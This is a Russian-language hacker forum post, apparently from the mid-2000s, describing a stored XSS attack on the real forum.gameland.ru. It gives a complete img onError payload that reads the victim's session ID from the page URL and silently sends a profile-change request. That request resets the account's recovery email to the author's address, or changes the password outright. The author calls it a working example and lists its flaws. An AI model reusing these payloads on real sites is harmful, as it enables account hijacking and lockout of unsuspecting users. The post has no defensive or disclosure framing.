Не так давно в файл-логе моего сниффера(http://zero.h12.ru/)начали появляться ссылки на форум http://forum.gameland.ru. Захожу посмотреть, а там наш Че восхищается этим форумом в плане его дырявости, что мол скоро он будет обязательно взломан и все такое) Ну жду,значит появления статьи на античате, не дождался, видимо он не стал заниматься этим. И вот решил сегодня попробовать сам.
Итак, уязвимы там, как я понял все возможные поля. Разрешены некоторые тэги, сначала я поробовал вставить скрипт через тэг &lt;a&gt; - влегкую. Но для взлома желательно использовать картинку, для скрытности, и тэг &lt;img&gt;, разумеется тоже пропускает скрипты. Думаю, поработаю со сниффером: отловлю referer(для получения ID) и cookies, и буду заходить в чужие настройки, короче заняться XSS. Но тут решил зайти в свои для начала. И что же? Действительно клево, давно такого извращения не встречал) Абсолютно все настройки меняются без запроса текущего пароля, а именно: пароль, мыло для напоминания пароля - короче все самое интересное для нас. Ну повозился немного с JavaScript, (методы использовал, описанные в моей заметке &quot;Почтовые WWW-интерфейсы&quot и вот что получилось. Способ вставки скрипта:<span style='color:red'>
&lt;img src='x'onError=alert();&gt;</span>
Сам скрипт такой.
Вырезаем из location идентификатор (обычно позиция с 57 и 32 в длину)<span style='color:red'>
stroka=location &amp;#43;1; str=stroka.substr(58, 32);</span> Здесь &amp;#43; -код символа +, потому что иначе он не проходит.
задаваемый на обработчик onError URL изменения настройки:<span style='color:red'>
document.coolpict.src='http://forum.gameland.ru/profile/pro...9;&amp;#43;str &amp;#43;'&amp;EMAIL=visitlink@fromru.com';</span>
В этом случае я меняю только мыло для того чтобы мне выслали на него чужой пароль. А можно сразу и пароль поменять, правда отрезав тем самым юзера от своего аккаунта:<span style='color:red'>
document.coolpict.src='http://forum.gameland.ru/profile/pro...9;&amp;#43;str &amp;#43;'&amp;PASSWORD=XXXX&amp;CONFIRM_PASSWORD= XXXX';</span>
Полностью, код который нужно вставлять в тело сообщения выглядит так:</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
<img name=coolpict src='x'OnError=`stroka=location &amp;#43;1; str=stroka.substr(58, 32); document.coolpict.src='http://forum.gameland.ru/profile/profile.asp?mode=store&amp;sessionID='&amp;#43;str &amp;#43;'&amp;EMAIL=visitlink@fromru.com';`>[/QUOTE]<span id='postcolor'>
Когда пользователь загружает картинку, происходит ошибка, и JS автоматически загружает другую &quot;картинку&quot; - изменение настроек.
Так... Недостатки , значицца следующие)) : пользователь может просматреть свойства &quot;рисунка&quot;; громоздко, и неоптимизированно, некоторые браузеры, подозреваю, вообще не так проинтерпритируют код; почему-то срабатывает только если изначально включена графика, а на &quot;показать рисунок&quot; сработал только один раз и перестал); через раз также мой IE6 выдаёт ошибку о переполнении стэка и аварийно завершает работу; и самое главное, в некоторых случаях поле location может немного отличаться от того, под которую занесены параметры для функции substr().
Ну если кому-то будет очень нужно, тот все сможет оптимизировать, а для меня в этом нет надобности. В целом, пример рабочий.